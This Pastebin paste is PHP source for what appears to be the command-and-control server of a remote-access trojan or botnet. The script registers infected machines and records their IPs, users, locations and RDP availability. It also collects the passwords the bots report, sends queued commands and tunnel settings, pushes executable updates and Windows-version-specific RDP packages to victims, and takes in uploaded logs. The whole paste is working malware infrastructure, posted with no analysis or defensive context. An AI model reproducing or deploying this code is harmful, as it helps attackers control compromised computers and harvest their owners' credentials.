API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 10th, 2017
85
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.42 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. error_reporting(0);
  3. define(XTERM_CFG_DIR,$_SERVER["DOCUMENT_ROOT"]."/_xtcfg2");
  4. include XTERM_CFG_DIR."/maincfg.php";
  5. //error_reporting(E_ALL);
  6.  
  7. if((empty($_POST["q"]))||(empty($_POST["id"]))) die("main");
  8. if($_POST["q"]!="l") if((empty($_POST["o"]))||(empty($_POST["v"]))) die("main2");
  9.  
  10. $dwQType=$_POST["q"];
  11. $szID=SQLShield($_POST["id"]);
  12. $szRATVer=SQLShield($_POST["v"]);
  13.  
  14.  
  15. if($_POST["q"]!="l"){
  16. $rgVer=explode(":",SQLShield($_POST["o"])); //platf:mj:mn:build:sp-mj:sp-mn:suite:type:bits:csdver
  17. if(count($rgVer)<10) die("ver");
  18. }
  19.  
  20. //-------------------------
  21. function BotLog($szText){
  22. if(!($hFile=fopen(BOTS_LOG,"a+"))) return;
  23. fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
  24. fclose($hFile);
  25. }
  26.  
  27. function AccessLog($szText){
  28. if(!defined("ACCESS_LOG_ENABLED")) return;
  29. if(!($hFile=fopen(ACCESS_LOG,"a+"))) return;
  30. fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
  31. fclose($hFile);
  32. }
  33.  
  34. function IsBotExist($szID){
  35. if(!($r=mysql_query("SELECT * FROM xt2_alive WHERE bid='$szID'"))){
  36. BotLog("SQL Exist failed: ".mysql_error());
  37. return NULL;
  38. }
  39.  
  40. if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgRow=$row; else $rgRow=NULL;
  41. mysql_free_result($r);
  42. return $rgRow;
  43. }
  44.  
  45. function AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){
  46. $q="INSERT INTO xt2_alive (bid,ctime,atime,uptime,rip,lip,user,country,lang,os_ver,bot_ver,bflags,tstate) VALUES ";
  47. $q.="('$szID',NOW(),NOW(),'$dwUptime','$szRIP','$szLIP','$szUser','$szCountry','$szLang','$szOS','$szBotVer','$dwFlags','$szTS')";
  48.  
  49. if(mysql_query($q)) return;
  50. BotLog("SQL Add failed: ($q) ".mysql_error());
  51. }
  52.  
  53.  
  54. function UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){
  55. $q="UPDATE xt2_alive SET atime=NOW(),uptime='$dwUptime',rip='$szRIP',lip='$szLIP',user='$szUser',country='$szCountry',lang='$szLang',os_ver='$szOS',";
  56. $q.="bot_ver='$szBotVer',bflags=$dwFlags,tstate='$szTS' ";
  57. $q.="WHERE bid='".$rgRow['bid']."'";
  58.  
  59. if(mysql_query($q)) return;
  60. BotLog("SQL Update failed: ($q) ".mysql_error());
  61. }
  62.  
  63.  
  64. function UpdateMsg($szID,$szMsg){
  65. mysql_query("UPDATE xt2_alive SET reply='".strftime("[%d.%m.%Y %H:%M:%S] ")."$szMsg' WHERE bid='$szID'");
  66. }
  67.  
  68. function UpdateLP($rgRow,$szID,$szNewPass){
  69. if($rgRow){
  70. $szPassList=$rgRow["passwds"];
  71. $rgPasswds=explode(';',$szPassList);
  72. foreach($rgPasswds as $szOldPass) if($szOldPass==$szNewPass) return;
  73. }else $szPassList="";
  74.  
  75. $szPassList.="$szNewPass;";
  76. $rgRow["passwds"]=$szPassList;
  77.  
  78. mysql_query("UPDATE xt2_alive SET passwds='$szPassList' WHERE bid='$szID'");
  79. }
  80.  
  81. function SendFile($szFile,$szCmd,$dwUPID,$fDel=false){
  82. if(!file_exists($szFile)) return "No such file $szFile";
  83. $dwSize=filesize($szFile);
  84.  
  85. if(!($hFile=fopen($szFile,"r"))) return "Can't open $szFile";
  86.  
  87. header("Cache-control: private");
  88. header("Content-Type: application/octet-stream");
  89. header("Content-Length: ".($dwSize+5+1+1+8)); //+ <WEB>+X
  90. header("Content-Disposition: attachment; filename=\"".mktime().".exe\"");
  91.  
  92. if((strlen($dwUPID)==8)&&($dwUPID=="smss_fix")) echo sprintf("%s%s",$szCmd,$dwUPID); else echo sprintf("%s%08X",$szCmd,($dwUPID+0));
  93. fpassthru($hFile);
  94.  
  95. fclose($hFile);
  96.  
  97. if($fDel) unlink($szFile);
  98.  
  99. AccessLog($_SERVER["REMOTE_ADDR"]." Sent $szFile");
  100.  
  101. die;
  102. }
  103.  
  104. function UpdateVersion($szBotVer){
  105. if(!($r=mysql_query("SELECT * FROM xt2_cfg"))) return NULL;
  106. $rgCfg=array();
  107. while(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgCfg[$row["name"]]=$row["val"];
  108. mysql_free_result($r);
  109.  
  110. $dwBotVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$szBotVer);
  111. $dwCurrentVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$rgCfg["current_xt_ver"]);
  112. if(($dwBotVer>100)&&($dwCurrentVer>100)&&($dwBotVer>=$dwCurrentVer)) return NULL;
  113.  
  114. if($szBotVer==$rgCfg["current_xt_ver"]) return NULL;
  115. if((!strchr($rgCfg["update_file"],"/"))&&(!strchr($rgCfg["update_file"],"\\"))) $rgCfg["update_file"]=UPDATE_DIR.$rgCfg["update_file"];
  116. return SendFile($rgCfg["update_file"],"U",$rgCfg["update_id"],false);
  117. }
  118.  
  119. function CustomUpload($szBotID){
  120. if(!($r=mysql_query("SELECT * FROM xt2_cfg WHERE name like 'upl_%' AND val like '$szBotID:%' LIMIT 1"))) return NULL;
  121. if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgUpl=explode(':',$row["val"]); else $rgUpl=NULL;
  122. mysql_free_result($r);
  123. if(!$rgUpl) return NULL;
  124.  
  125. mysql_query("DELETE FROM xt2_cfg WHERE id=".$row["id"]);
  126.  
  127. return SendFile(UPDATE_DIR.$rgUpl[2],"U",$rgUpl[1],true);
  128. }
  129.  
  130. function CheckMSRDP($szIP){
  131. if(!($hSock=fsockopen($szIP,3389,&$err,&$strerr,10))) return FALSE;
  132. fclose($hSock);
  133. return TRUE;
  134. }
  135.  
  136.  
  137. function Alive($szID,$rgVer,$szCountry,$szLang,$dwUptime,$szBotVer,$szLIP,$szUser,$szMsg,$szTS){
  138. $szRIP=$_SERVER["REMOTE_ADDR"];
  139. $dwFlags=0;
  140. $szOS=implode(":",$rgVer);
  141.  
  142. //Check RDP
  143. if(!empty($szLIP)){
  144. if(($szLIP==$_SERVER["REMOTE_ADDR"])&&($szTS=="OK")) if(CheckMSRDP($_SERVER["REMOTE_ADDR"])) $dwFlags|=0x00000001;
  145. }else if(CheckMSRDP()) $dwFlags|=0x00000001;
  146.  
  147.  
  148. SQLConnect();
  149. if(!($rgRow=IsBotExist($szID))) AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
  150. else UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
  151.  
  152. if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
  153.  
  154. //LP
  155. for($i=0;$i<12;$i++) if(!empty($_POST["lp$i"])) UpdateLP($rgRow,$szID,SQLShield($_POST["lp$i"])); else break;
  156.  
  157. //--Reply--
  158. echo "<WEB>+";
  159.  
  160. if($rgRow){
  161. if(!empty($rgRow["send_cmd"])) echo $rgRow["send_cmd"];
  162. if(($rgTun=IsTunnelSet($rgRow["send_tun"]))) echo "T".$rgTun[0].":".$rgTun[4].":".$rgTun[5].";";
  163.  
  164. mysql_query("UPDATE xt2_alive SET send_tun=NULL,send_cmd=NULL WHERE bid='$szID'");
  165. }
  166.  
  167. //Check update,dies on update
  168. if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s");
  169. if(($s=CustomUpload($szID))) BotLog("[L] $s");
  170.  
  171. if($_POST["smss"]=="fix"){
  172. if(($s=SendFile(CABS_DIR."smss.fix","U","smss_fix",FALSE))) BotLog("[F] $s");
  173. }
  174.  
  175. die;
  176. }
  177.  
  178. function SendPack($szID,$rgVer,$szBotVer,$szMsg){
  179. $szOS=implode(":",$rgVer);
  180. SQLConnect();
  181.  
  182. if(!($rgRow=IsBotExist($szID))) AddBot($szID,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,"");
  183. else UpdateBot($rgRow,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,"");
  184.  
  185. if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
  186.  
  187. echo "<WEB>+";
  188.  
  189. if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s");
  190. if(($s=CustomUpload($szID))) BotLog("[L] $s");
  191.  
  192. switch($rgVer[1]){
  193. case "4":
  194. case "5":
  195. if($rgVer[2]=="0"){ //2000
  196. $szPack=CABS_DIR."5.0-2.32.cab";
  197. }else if($rgVer[2]=="2"){ //5.2
  198. if($rgVer[7]!=1){ //2003
  199. if($rgVer[8]==64) $szPack=CABS_DIR."5.2.64-s.cab"; else $szPack=CABS_DIR."5.0-2.32.cab";
  200. }else $szPack=CABS_DIR."5.2.64-c.cab";
  201. }else{ //5.1
  202. if($rgVer[4]=="3") $szPack=CABS_DIR."5.1.32-s3.cab"; else $szPack=CABS_DIR."5.1.32.cab";
  203. }
  204. break;
  205.  
  206. case "6":
  207. if($rgVer[8]==64) $szPack=CABS_DIR."6.x.64.cab"; else $szPack=CABS_DIR."6.x.32.cab";
  208. break;
  209.  
  210. default:
  211. BotLog("[C] Unknown version of $szID ($szOS): $r");
  212. die("X");
  213. break;
  214. }
  215.  
  216. $r=SendFile($szPack,"R",0,false);
  217. BotLog("[C] File not found $szPack for $szID ($szOS): $r");
  218. die("X");
  219. }
  220.  
  221. //-------------------------
  222.  
  223. switch($dwQType){
  224. case "i": //Get RDP pack
  225. AccessLog($_SERVER["REMOTE_ADDR"]." Pack file request: ".implode('|',$_POST));
  226. SendPack($szID,$rgVer,$szRATVer,SQLShield($_POST["msg"]));
  227. break;
  228.  
  229. case "a": //Alive
  230. $szLIP=SQLShield($_POST["lip"]);
  231. $szTS=SQLShield($_POST["ts"]);
  232. if((empty($_POST["l"]))||(empty($_POST["c"]))||(!isset($_POST["t"]))) die;
  233. AccessLog($_SERVER["REMOTE_ADDR"]." Alive ".implode('|',$_POST));
  234. Alive($szID,$rgVer,SQLShield($_POST["c"]),SQLShield($_POST["l"]),SQLShield($_POST["t"]),$szRATVer,$szLIP,SQLShield($_POST["u"]),SQLShield($_POST["msg"]),$szTS);
  235. break;
  236.  
  237. case "l": //DebugLog
  238. if(!isset($_FILES["f0"])) die;
  239. AccessLog($_SERVER["REMOTE_ADDR"]." Log from $szID");
  240. $rgFile=$_FILES["f0"];
  241. if(!move_uploaded_file($rgFile["tmp_name"],XTERM_CFG_DIR."/logs/_debug-$szID.".sprintf("%08X",mktime()).".log")) die;
  242. mysql_query("UPDATE xt2_alive SET send_cmd=NULL WHERE bid='".$szID."'");
  243. die("ok");
  244. break;
  245. }
  246.  
  247.  
  248. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!